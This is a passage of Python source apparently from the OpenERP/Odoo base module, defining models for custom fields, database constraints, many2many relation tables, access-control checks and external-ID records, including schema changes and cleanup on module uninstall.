model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def instanciate(self, cr, user, model, context=None):
if isinstance(model, unicode):
model = model.encode('utf-8')
class CustomModel(models.Model):
_name = model
_module = False
_custom = True
CustomModel._build_model(self.pool, cr)
class ir_model_fields(osv.osv):
_name = 'ir.model.fields'
_description = "Fields"
_rec_name = 'field_description'
_columns = {
'name': fields.char('Name', required=True, select=1),
'complete_name': fields.char('Complete Name', select=1),
'model': fields.char('Object Name', required=True, select=1,
help="The technical name of the model this field belongs to"),
'relation': fields.char('Object Relation',
help="For relationship fields, the technical name of the target model"),
'relation_field': fields.char('Relation Field',
help="For one2many fields, the field on the target model that implement the opposite many2one relationship"),
'model_id': fields.many2one('ir.model', 'Model', required=True, select=True, ondelete='cascade',
help="The model this field belongs to"),
'field_description': fields.char('Field Label', required=True),
'ttype': fields.selection(_get_fields_type, 'Field Type', required=True),
'selection': fields.char('Selection Options', help="List of options for a selection field, "
"specified as a Python expression defining a list of (key, label) pairs. "
"For example: [('blue','Blue'),('yellow','Yellow')]"),
'required': fields.boolean('Required'),
'readonly': fields.boolean('Readonly'),
'select_level': fields.selection([('0','Not Searchable'),('1','Always Searchable'),('2','Advanced Search (deprecated)')],'Searchable', required=True),
'translate': fields.boolean('Translatable', help="Whether values for this field can be translated (enables the translation mechanism for that field)"),
'size': fields.integer('Size'),
'state': fields.selection([('manual','Custom Field'),('base','Base Field')],'Type', required=True, readonly=True, select=1),
'on_delete': fields.selection([('cascade', 'Cascade'), ('set null', 'Set NULL'), ('restrict', 'Restrict')],
'On Delete', help='On delete property for many2one fields'),
'domain': fields.char('Domain', help="The optional domain to restrict possible values for relationship fields, "
"specified as a Python expression defining a list of triplets. "
"For example: [('color','=','red')]"),
'groups': fields.many2many('res.groups', 'ir_model_fields_group_rel', 'field_id', 'group_id', 'Groups'),
'selectable': fields.boolean('Selectable'),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the field is defined'),
'serialization_field_id': fields.many2one('ir.model.fields', 'Serialization Field', domain = "[('ttype','=','serialized')]",
ondelete='cascade', help="If set, this field will be stored in the sparse "
"structure of the serialization field, instead "
"of having its own database column. This cannot be "
"changed after creation."),
}
_rec_name='field_description'
_defaults = {
'selection': "",
'domain': "[]",
'name': 'x_',
'state': 'manual',
'on_delete': 'set null',
'select_level': '0',
'field_description': '',
'selectable': 1,
}
_order = "name"
def _check_selection(self, cr, uid, selection, context=None):
try:
selection_list = eval(selection)
except Exception:
_logger.warning('Invalid selection list definition for fields.selection', exc_info=True)
raise except_orm(_('Error'),
_("The Selection Options expression is not a valid Pythonic expression."
"Please provide an expression in the [('key','Label'), ...] format."))
check = True
if not (isinstance(selection_list, list) and selection_list):
check = False
else:
for item in selection_list:
if not (isinstance(item, (tuple,list)) and len(item) == 2):
check = False
break
if not check:
raise except_orm(_('Error'),
_("The Selection Options expression is must be in the [('key','Label'), ...] format!"))
return True
def _size_gt_zero_msg(self, cr, user, ids, context=None):
return _('Size of the field can never be less than 0 !')
_sql_constraints = [
('size_gt_zero', 'CHECK (size>=0)',_size_gt_zero_msg ),
]
def _drop_column(self, cr, uid, ids, context=None):
for field in self.browse(cr, uid, ids, context):
if field.name in MAGIC_COLUMNS:
continue
model = self.pool[field.model]
cr.execute('select relkind from pg_class where relname=%s', (model._table,))
result = cr.fetchone()
cr.execute("SELECT column_name FROM information_schema.columns WHERE table_name ='%s' and column_name='%s'" %(model._table, field.name))
column_name = cr.fetchone()
if column_name and (result and result[0] == 'r'):
cr.execute('ALTER table "%s" DROP column "%s" cascade' % (model._table, field.name))
# remove m2m relation table for custom fields
# we consider the m2m relation is only one way as it's not possible
# to specify the relation table in the interface for custom fields
# TODO master: maybe use ir.model.relations for custom fields
if field.state == 'manual' and field.ttype == 'many2many':
rel_name = model._fields[field.name].relation
cr.execute('DROP table "%s"' % (rel_name))
model._pop_field(field.name)
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module columns
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG) and \
any(field.state != 'manual' for field in self.browse(cr, user, ids, context)):
raise except_orm(_('Error'), _("This column contains module data and cannot be removed!"))
self._drop_column(cr, user, ids, context)
res = super(ir_model_fields, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
# The field we just deleted might have be inherited, and registry is
# inconsistent in this case; therefore we reload the registry.
cr.commit()
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def create(self, cr, user, vals, context=None):
if 'model_id' in vals:
model_data = self.pool['ir.model'].browse(cr, user, vals['model_id'])
vals['model'] = model_data.model
if context is None:
context = {}
if vals.get('ttype', False) == 'selection':
if not vals.get('selection',False):
raise except_orm(_('Error'), _('For selection fields, the Selection Options must be given!'))
self._check_selection(cr, user, vals['selection'], context=context)
res = super(ir_model_fields,self).create(cr, user, vals, context)
if vals.get('state','manual') == 'manual':
if not vals['name'].startswith('x_'):
raise except_orm(_('Error'), _("Custom fields must have a name that starts with 'x_' !"))
if vals.get('relation',False) and not self.pool['ir.model'].search(cr, user, [('model','=',vals['relation'])]):
raise except_orm(_('Error'), _("Model %s does not exist!") % vals['relation'])
self.pool.clear_manual_fields()
if vals['model'] in self.pool:
model = self.pool[vals['model']]
if vals['model'].startswith('x_') and vals['name'] == 'x_name':
model._rec_name = 'x_name'
# re-initialize model in registry
model.__init__(self.pool, cr)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context is None:
context = {}
#For the moment renaming a sparse field or changing the storing system is not allowed. This may be done later
if 'serialization_field_id' in vals or 'name' in vals:
for field in self.browse(cr, user, ids, context=context):
if 'serialization_field_id' in vals and field.serialization_field_id.id != vals['serialization_field_id']:
raise except_orm(_('Error!'), _('Changing the storing system for field "%s" is not allowed.')%field.name)
if field.serialization_field_id and (field.name != vals['name']):
raise except_orm(_('Error!'), _('Renaming sparse field "%s" is not allowed')%field.name)
# if set, *one* column can be renamed here
column_rename = None
# names of the models to patch
patched_models = set()
if vals and ids:
checked_selection = False # need only check it once, so defer
for item in self.browse(cr, user, ids, context=context):
obj = self.pool.get(item.model)
field = getattr(obj, '_fields', {}).get(item.name)
if item.state != 'manual':
raise except_orm(_('Error!'),
_('Properties of base fields cannot be altered in this manner! '
'Please modify them through Python code, '
'preferably through a custom addon!'))
if item.ttype == 'selection' and 'selection' in vals \
and not checked_selection:
self._check_selection(cr, user, vals['selection'], context=context)
checked_selection = True
final_name = item.name
if 'name' in vals and vals['name'] != item.name:
# We need to rename the column
if column_rename:
raise except_orm(_('Error!'), _('Can only rename one column at a time!'))
if vals['name'] in obj._columns:
raise except_orm(_('Error!'), _('Cannot rename column to %s, because that column already exists!') % vals['name'])
if vals.get('state', 'manual') == 'manual' and not vals['name'].startswith('x_'):
raise except_orm(_('Error!'), _('New column name must still start with x_ , because it is a custom field!'))
if '\'' in vals['name'] or '"' in vals['name'] or ';' in vals['name']:
raise ValueError('Invalid character in column name')
column_rename = (obj, (obj._table, item.name, vals['name']))
final_name = vals['name']
if 'model_id' in vals and vals['model_id'] != item.model_id.id:
raise except_orm(_("Error!"), _("Changing the model of a field is forbidden!"))
if 'ttype' in vals and vals['ttype'] != item.ttype:
raise except_orm(_("Error!"), _("Changing the type of a column is not yet supported. "
"Please drop it and create it again!"))
# We don't check the 'state', because it might come from the context
# (thus be set for multiple fields) and will be ignored anyway.
if obj is not None and field is not None:
patched_models.add(obj._name)
# These shall never be written (modified)
for column_name in ('model_id', 'model', 'state'):
if column_name in vals:
del vals[column_name]
res = super(ir_model_fields,self).write(cr, user, ids, vals, context=context)
self.pool.clear_manual_fields()
if column_rename:
obj, rename = column_rename
cr.execute('ALTER TABLE "%s" RENAME COLUMN "%s" TO "%s"' % rename)
if column_rename or patched_models:
# setup models, this will reload all manual fields in registry
self.pool.setup_models(cr, partial=(not self.pool.ready))
if patched_models:
# We have to update _columns of the model(s) and then call their
# _auto_init to sync the db with the model. Hopefully, since write()
# was called earlier, they will be in-sync before the _auto_init.
# Anything we don't update in _columns now will be reset from
# the model into ir.model.fields (db).
ctx = dict(context,
select=vals.get('select_level', '0'),
update_custom_fields=True,
)
for model_name in patched_models:
obj = self.pool[model_name]
obj._auto_init(cr, ctx)
obj._auto_end(cr, ctx) # actually create FKs!
if column_rename or patched_models:
RegistryManager.signal_registry_change(cr.dbname)
return res
class ir_model_constraint(Model):
"""
This model tracks PostgreSQL foreign keys and constraints used by OpenERP
models.
"""
_name = 'ir.model.constraint'
_columns = {
'name': fields.char('Constraint', required=True, select=1,
help="PostgreSQL constraint or foreign key name."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'type': fields.char('Constraint Type', required=True, size=1, select=1,
help="Type of the constraint: `f` for a foreign key, "
"`u` for other constraints."),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)',
'Constraints with the same name are unique per module.'),
]
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL foreign keys and constraints tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
context = dict(context or {})
ids_set = set(ids)
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model.model
model_obj = self.pool[model]
name = openerp.tools.ustr(data.name)
typ = data.type
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_constraint where name=%s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
if typ == 'f':
# test if FK exists on this table (it could be on a related m2m table, in which case we ignore it)
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('f', name, model_obj._table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (model_obj._table, name),)
_logger.info('Dropped FK CONSTRAINT %s@%s', name, model)
if typ == 'u':
# test if constraint exists
cr.execute("""SELECT 1 from pg_constraint cs JOIN pg_class cl ON (cs.conrelid = cl.oid)
WHERE cs.contype=%s and cs.conname=%s and cl.relname=%s""", ('u', name, model_obj._table))
if cr.fetchone():
cr.execute('ALTER TABLE "%s" DROP CONSTRAINT "%s"' % (model_obj._table, name),)
_logger.info('Dropped CONSTRAINT %s@%s', name, model)
self.unlink(cr, uid, ids, context)
class ir_model_relation(Model):
"""
This model tracks PostgreSQL tables used to implement OpenERP many2many
relations.
"""
_name = 'ir.model.relation'
_columns = {
'name': fields.char('Relation Name', required=True, select=1,
help="PostgreSQL table name implementing a many2many relation."),
'model': fields.many2one('ir.model', string='Model',
required=True, select=1),
'module': fields.many2one('ir.module.module', string='Module',
required=True, select=1),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Initialization Date')
}
def _module_data_uninstall(self, cr, uid, ids, context=None):
"""
Delete PostgreSQL many2many relations tracked by this model.
"""
if uid != SUPERUSER_ID and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
ids_set = set(ids)
to_drop_table = []
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model
name = openerp.tools.ustr(data.name)
# double-check we are really going to delete all the owners of this schema element
cr.execute("""SELECT id from ir_model_relation where name = %s""", (data.name,))
external_ids = [x[0] for x in cr.fetchall()]
if set(external_ids)-ids_set:
# as installed modules have defined this element we must not delete it!
continue
cr.execute("SELECT 1 FROM information_schema.tables WHERE table_name=%s", (name,))
if cr.fetchone() and not name in to_drop_table:
to_drop_table.append(name)
self.unlink(cr, uid, ids, context)
# drop m2m relation tables
for table in to_drop_table:
cr.execute('DROP TABLE %s CASCADE'% table,)
_logger.info('Dropped table %s', table)
cr.commit()
class ir_model_access(osv.osv):
_name = 'ir.model.access'
_columns = {
'name': fields.char('Name', required=True, select=True),
'active': fields.boolean('Active', help='If you uncheck the active field, it will disable the ACL without deleting it (if you delete a native ACL, it will be re-created when you reload the module.'),
'model_id': fields.many2one('ir.model', 'Object', required=True, domain=[('osv_memory','=', False)], select=True, ondelete='cascade'),
'group_id': fields.many2one('res.groups', 'Group', ondelete='cascade', select=True),
'perm_read': fields.boolean('Read Access'),
'perm_write': fields.boolean('Write Access'),
'perm_create': fields.boolean('Create Access'),
'perm_unlink': fields.boolean('Delete Access'),
}
_defaults = {
'active': True,
}
def check_groups(self, cr, uid, group):
grouparr = group.split('.')
if not grouparr:
return False
cr.execute("select 1 from res_groups_users_rel where uid=%s and gid IN (select res_id from ir_model_data where module=%s and name=%s)", (uid, grouparr[0], grouparr[1],))
return bool(cr.fetchone())
def check_group(self, cr, uid, model, mode, group_ids):
""" Check if a specific group has the access mode to the specified model"""
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
model_name = model.name
else:
model_name = model
if isinstance(group_ids, (int, long)):
group_ids = [group_ids]
for group_id in group_ids:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id = %s", (model_name, group_id)
)
r = cr.fetchone()
if r is None:
cr.execute("SELECT perm_" + mode + " "
" FROM ir_model_access a "
" JOIN ir_model m ON (m.id = a.model_id) "
" WHERE m.model = %s AND a.active IS True "
" AND a.group_id IS NULL", (model_name, )
)
r = cr.fetchone()
access = bool(r and r[0])
if access:
return True
# pass no groups -> no access
return False
def group_names_with_access(self, cr, model_name, access_mode):
"""Returns the names of visible groups which have been granted ``access_mode`` on
the model ``model_name``.
:rtype: list
"""
assert access_mode in ['read','write','create','unlink'], 'Invalid access mode: %s' % access_mode
cr.execute('''SELECT
c.name, g.name
FROM
ir_model_access a
JOIN ir_model m ON (a.model_id=m.id)
JOIN res_groups g ON (a.group_id=g.id)
LEFT JOIN ir_module_category c ON (c.id=g.category_id)
WHERE
m.model=%s AND
a.active IS True AND
a.perm_''' + access_mode, (model_name,))
return [('%s/%s' % x) if x[0] else x[1] for x in cr.fetchall()]
# The context parameter is useful when the method translates error messages.
# But as the method raises an exception in that case, the key 'lang' might
# not be really necessary as a cache key, unless the `ormcache_context`
# decorator catches the exception (it does not at the moment.)
@tools.ormcache_context(accepted_keys=('lang',))
def check(self, cr, uid, model, mode='read', raise_exception=True, context=None):
if uid==1:
# User root have all accesses
# TODO: exclude xml-rpc requests
return True
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
model_name = model.model
else:
model_name = model
# TransientModel records have no access rights, only an implicit access rule
if model_name not in self.pool:
_logger.error('Missing model %s' % (model_name, ))
elif self.pool[model_name].is_transient():
return True
# We check if a specific rule exists
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' JOIN res_groups_users_rel gu ON (gu.gid = a.group_id) '
' WHERE m.model = %s '
' AND gu.uid = %s '
' AND a.active IS True '
, (model_name, uid,)
)
r = cr.fetchone()[0]
if r is None:
# there is no specific rule. We check the generic rule
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' WHERE a.group_id IS NULL '
' AND m.model = %s '
' AND a.active IS True '
, (model_name,)
)
r = cr.fetchone()[0]
if not r and raise_exception:
groups = '\n\t'.join('- %s' % g for g in self.group_names_with_access(cr, model_name, mode))
msg_heads = {
# Messages are declared in extenso so they are properly exported in translation terms
'read': _("Sorry, you are not allowed to access this document."),
'write': _("Sorry, you are not allowed to modify this document."),
'create': _("Sorry, you are not allowed to create this kind of document."),
'unlink': _("Sorry, you are not allowed to delete this document."),
}
if groups:
msg_tail = _("Only users with the following access level are currently allowed to do that") + ":\n%s\n\n(" + _("Document model") + ": %s)"
msg_params = (groups, model_name)
else:
msg_tail = _("Please contact your system administrator if you think this is an error.") + "\n\n(" + _("Document model") + ": %s)"
msg_params = (model_name,)
_logger.warning('Access Denied by ACLs for operation: %s, uid: %s, model: %s', mode, uid, model_name)
msg = '%s %s' % (msg_heads[mode], msg_tail)
raise openerp.exceptions.AccessError(msg % msg_params)
return bool(r)
__cache_clearing_methods = []
def register_cache_clearing_method(self, model, method):
self.__cache_clearing_methods.append((model, method))
def unregister_cache_clearing_method(self, model, method):
try:
i = self.__cache_clearing_methods.index((model, method))
del self.__cache_clearing_methods[i]
except ValueError:
pass
def call_cache_clearing_methods(self, cr):
self.invalidate_cache(cr, SUPERUSER_ID)
self.check.clear_cache(self) # clear the cache of check function
for model, method in self.__cache_clearing_methods:
if model in self.pool:
getattr(self.pool[model], method)()
#
# Check rights on actions
#
def write(self, cr, uid, ids, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).write(cr, uid, ids, values, context=context)
return res
def create(self, cr, uid, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).create(cr, uid, values, context=context)
return res
def unlink(self, cr, uid, ids, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).unlink(cr, uid, ids, context=context)
return res
class ir_model_data(osv.osv):
"""Holds external identifier keys for records in the database.
This has two main uses:
* allows easy data integration with third-party systems,
making import/export/sync of data possible, as records
can be uniquely identified across multiple systems
* allows tracking the origin of data installed by OpenERP
modules themselves, thus making it possible to later
update them seamlessly.
"""
_name = 'ir.model.data'
_order = 'module,model,name'
def name_get(self, cr, uid, ids, context=None):
bymodel = defaultdict(dict)
names = {}
for res in self.browse(cr, uid, ids, context=context):
bymodel[res.model][res.res_id] = res
names[res.id] = res.complete_name
#result[res.model][res.res_id] = res.id
for model, id_map in bymodel.iteritems():
try:
ng = dict(self.pool[model].name_get(cr, uid, id_map.keys(), context=context))
except Exception:
pass
else:
for r in id_map.itervalues():
names[r.id] = ng.get(r.res_id, r.complete_name)
return [(i, names[i]) for i in ids]
def _complete_name_get(self, cr, uid, ids, prop, unknow_none, context=None):
result = {}
for res in self.browse(cr, uid, ids, context=context):
result[res.id] = (res.module and (res.module + '.') or '')+res.name
return result
_columns = {
'name': fields.char('External Identifier', required=True, select=1,
help="External Key/Identifier that can be used for "
"data integration with third-party systems"),
'complete_name': fields.function(_complete_name_get, type='char', string='Complete ID'),
'model': fields.char('Model Name', required=True, select=1),
'module': fields.char('Module', required=True, select=1),
'res_id': fields.integer('Record ID', select=1,
help="ID of the target record in the database"),
'noupdate': fields.boolean('Non Updatable'),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Init Date')
}
_defaults = {
'date_init': fields.datetime.now,
'date_update': fields.datetime.now,
'noupdate': False,
'module': ''
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)', 'You cannot have multiple records with the same external ID in the same module!'),
]
def __init__(self, pool, cr):
osv.osv.__init__(self, pool, cr)
# also stored in pool to avoid being discarded along with this osv instance
if getattr(pool, 'model_data_reference_ids', None) is None:
self.pool.model_data_reference_ids = {}
# put loads on the class, in order to share it among all instances
type(self).loads = self.pool.model_data_reference_ids
def _auto_init(self, cr, context=None):
res = super(ir_model_data, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'ir_model_data_module_name_index\'')
if not cr.fetchone():
cr.execute('CREATE INDEX ir_model_data_module_name_index ON ir_model_data (module, name)')
return res
# NEW V8 API
@tools.ormcache(skiparg=3)
def xmlid_lookup(self, cr, uid, xmlid):
"""Low level xmlid lookup
Return (id, res_model, res_id) or raise ValueError if not found
"""
module, name = xmlid.split('.', 1)
ids = self.search(cr, uid, [('module','=',module), ('name','=', name)])
if not ids:
raise ValueError('External ID not found in the system: %s' % (xmlid))
# the sql constraints ensure us we have only one result
res = self.read(cr, uid, ids[0], ['model', 'res_id'])
if not res['res_id']:
raise ValueError('External ID not found in the system: %s' % (xmlid))
return ids[0], res['model'], res['res_id']
def xmlid_to_res_model_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Return (res_model, res_id)"""
try:
return self.xmlid_lookup(cr, uid, xmlid)[1:3]
except ValueError:
if raise_if_not_found:
raise
return (False, False)
def xmlid_to_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Returns res_id """
return self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)[1]
def xmlid_to_object(self, cr, uid, xmlid, raise_if_not_found=False, context=None):
""" Return a browse_record
if not found and raise_if_not_found is True return None
"""
t = self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)
res_model, res_id = t
if res_model and res_id:
record = self.pool[res_model].browse(cr, uid, res_id, context=context)
if record.exists():
return record
if raise_if_not_found:
raise ValueError('No record found for unique ID %s. It may have been deleted.' % (xmlid))
return None
# OLD API
def _get_id(self, cr, uid, module, xml_id):
"""Returns the id of the ir.model.data record corresponding to a given module and xml_id (cached) or raise a ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[0]
def get_object_reference(self, cr, uid, module, xml_id):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached) or raise ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[1:3]
def check_object_reference(self, cr, uid, module, xml_id, raise_on_access_error=False):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached), if and only if the user has the necessary access rights
to see that object, otherwise raise a ValueError if raise_on_access_error is True or returns a tuple (model found, False)"""
model, res_id = self.get_object_reference(cr, uid, module, xml_id)
#search on id found in result to check if current user has read access right
check_right = self.pool.get(model).search(cr, uid, [('id', '=', res_id)])
if check_right:
return model, res_id
if raise_on_access_error:
raise ValueError('Not enough access rights on the external ID: %s.%s' % (module, xml_id))
return model, False
def get_object(self, cr, uid, module, xml_id, context=None):
""" Returns a browsable record for the given module name and xml_id.
If not found, raise a ValueError or return None, depending
on the value of `raise_exception`.
"""
return self.xmlid_to_object(cr, uid, "%s.%s" % (module, xml_id), raise_if_not_found=True, context=context)
def _update_dummy(self,cr, uid, model, module, xml_id=False, store=True):
if not xml_id:
return False
id = False
try:
# One step to check the ID is defined and the record actually exists
record = self.get_object(cr, uid, module, xml_id)
if record:
id = record.id
self.loads[(module,xml_id)] = (model,id)
for table, inherit_field in self.pool[model]._inherits.iteritems():
parent_id = record[inherit_field].id
parent_xid = '%s_%s' % (xml_id, table.replace('.', '_'))
self.loads[(module, parent_xid)] = (table, parent_id)
except Exception:
pass
return id
def clear_caches(self):
""" Clears all orm caches on the object's methods
:returns: itself
"""
self.xmlid_lookup.clear_cache(self)
return self
def unlink(self, cr, uid, ids, context=None):
""" Regular unlink method, but make sure to clear the caches. """
self.clear_caches()
return super(ir_model_data,self).unlink(cr, uid, ids, context=context)
def _update(self,cr, uid, model, module, values, xml_id=False, store=True, noupdate=False, mode='init', res_id=False, context=None):
model_obj = self.pool[model]
if not context:
context = {}
# records created during module install should not display the messages of OpenChatter
context = dict(context, install_mode=True)
if xml_id and ('.' in xml_id):
assert len(xml_id.split('.'))==2, _("'%s' contains too many dots. XML ids should not contain dots ! These are used to refer to other modules data, as in module.reference_id") % xml_id
module, xml_id = xml_id.split('.')
action_id = False
if xml_id:
cr.execute('''SELECT imd.id, imd.res_id, md.id, imd.model, imd.noupdate
FROM ir_model_data imd LEFT JOIN %s md ON (imd.res_id = md.id)
WHERE imd.module=%%s AND imd.name=%%s''' % model_obj._table,
(module, xml_id))
results = cr.fetchall()
for imd_id2,res_id2,real_id2,real_model,noupdate_imd in results:
# In update mode, do not update a record if it's ir.model.data is flagged as noupdate
if mode == 'update' and noupdate_imd:
return res_id2
if not real_id2:
self.clear_caches()
cr.execute('delete from ir_model_data where id=%s', (imd_id2,))
res_id = False
else:
assert model == real_model, "External ID conflict, %s already refers to a `%s` record,"\
" you can't define a `%s` record with this ID." % (xml_id, real_model, model)
res_id,action_id = res_id2,imd_id2
if action_id and res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
self.write(cr, SUPERUSER_ID, [action_id], {
'date_update': time.strftime('%Y-%m-%d %H:%M:%S'),
},context=context)
elif res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, SUPERUSER_ID, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, SUPERUSER_ID, {
'name': xml_id,
'model': model,
'module':module,
'res_id':res_id,
'noupdate': noupdate,
},context=context)
else:
if mode=='init' or (mode=='update' and xml_id):
inherit_xml_ids = []
if xml_id:
for table, field_name in model_obj._inherits.items():
xml_ids = self.pool['ir.model.data'].search(cr, uid, [
('module', '=', module),
('name', '=', xml_id + '_' + table.replace('.', '_')),
], context=context)
# XML ID found in the database, try to recover an existing record
if xml_ids:
found_xml_id = self.pool['ir.model.data'].browse(cr, uid, xml_ids[0], context=context)
record = self.pool[found_xml_id.model].browse(cr, uid, [found_xml_id.res_id], context=context)[0]
# The record exists, store the id and don't recreate the XML ID
if record.exists():
inherit_xml_ids.append(found_xml_id.model)
values[field_name] = found_xml_id.res_id
# Orphan XML ID, delete it
else:
found_xml_id.unlink()
res_id = model_obj.create(cr, uid, values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
if table in inherit_xml_ids:
continue
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, SUPERUSER_ID, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, SUPERUSER_ID, {
'name': xml_id,
'model': model,
'module': module,
'res_id': res_id,
'noupdate': noupdate
},context=context)
if xml_id and res_id:
self.loads[(module, xml_id)] = (model, res_id)
for table, inherit_field in model_obj._inherits.iteritems():
inherit_id = model_obj.read(cr, uid, [res_id],
[inherit_field])[0][inherit_field]
self.loads[(module, xml_id + '_' + table.replace('.', '_'))] = (table, inherit_id)
return res_id
def ir_set(self, cr, uid, key, key2, name, models, value, replace=True, isobject=False, meta=None, xml_id=False):
ir_values_obj = openerp.registry(cr.dbname)['ir.values']
ir_values_obj.set(cr, uid, key, key2, name, models, value, replace, isobject, meta)
return True
def _module_data_uninstall(self, cr, uid, modules_to_remove, context=None):
"""Deletes all the records referenced by the ir.model.data entries
``ids`` along with their corresponding database backed (including
dropping tables, columns, FKs, etc, as long as there is no other
ir.model.data entry holding a reference to them (which indicates that
they are still owned by another module).
Attempts to perform the deletion in an appropriate order to maximize
the chance of gracefully deleting all records.
This step is performed as part of the full uninstallation of a module.
"""
ids = self.search(cr, uid, [('module', 'in', modules_to_remove)])
if uid != 1 and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
raise except_orm(_('Permission Denied'), (_('Administrator access is required to uninstall a module')))
context = dict(context or {})
context[MODULE_UNINSTALL_FLAG] = True # enable model/field deletion
ids_set = set(ids)
wkf_todo = []
to_unlink = []
ids.sort()
ids.reverse()
for data in self.browse(cr, uid, ids, context):
model = data.model
res_id = data.res_id
pair_to_unlink = (model, res_id)
if pair_to_unlink not in to_unlink:
to_unlink.append(pair_to_unlink)
if model == 'workflow.activity':
# Special treatment for workflow activities: temporarily revert their
# incoming transition and trigger an update to force all workflow items
# to move out before deleting them
cr.execute('select res_type,res_id from wkf_instance where id IN (select inst_id from wkf_workitem where act_id=%s)', (res_id,))
wkf_todo.extend(cr.fetchall())
cr.execute("update wkf_transition set condition='True', group_id=NULL, signal=NULL,act_to=act_from,act_from=%s where act_to=%s", (res_id,res_id))
self.invalidate_cache(cr, uid, context=context)
for model,res_id in wkf_todo:
try:
openerp.workflow.trg_write(uid, model, res_id, cr)
except Exception:
_logger.info('Unable to force processing of workflow for item %s@%s in order to leave activity to be deleted', res_id, model, exc_info=True)
def unlink_if_refcount(to_unlink):
for model, res_id in to_unlink:
external_ids = self.search(cr, uid, [('model', '=', model),('res_id', '=', res_id)])
if set(external_ids)-ids_set:
# if other modules have defined this record, we must not delete it
continue
if model == 'ir.model.fields':
# Don't remove the LOG_ACCESS_COLUMNS unless _log_access
# has been turned off on the model.
field = self.pool[model].browse(cr, uid, [res_id], context=context)[0]
if not field.exists():
_logger.info('Deleting orphan external_ids %s', external_ids)
self.unlink(cr, uid, external_ids)
continue
if field.name in openerp.models.LOG_ACCESS_COLUMNS and self.pool[field.model]._log_access:
continue
if field.name == 'id':
continue
_logger.info('Deleting %s@%s', res_id, model)
try:
cr.execute('SAVEPOINT record_unlink_save')
self.pool[model].unlink(cr, uid, [res_id], context=context)
except Exception:
_logger.info('Unable to delete %s@%s', res_id, model, exc_info=True)
cr.execute('ROLLBACK TO SAVEPOINT record_unlink_save')
else:
cr.execute('RELEASE SAVEPOINT record_unlink_save')
# Remove non-model records first, then model fields, and finish with models
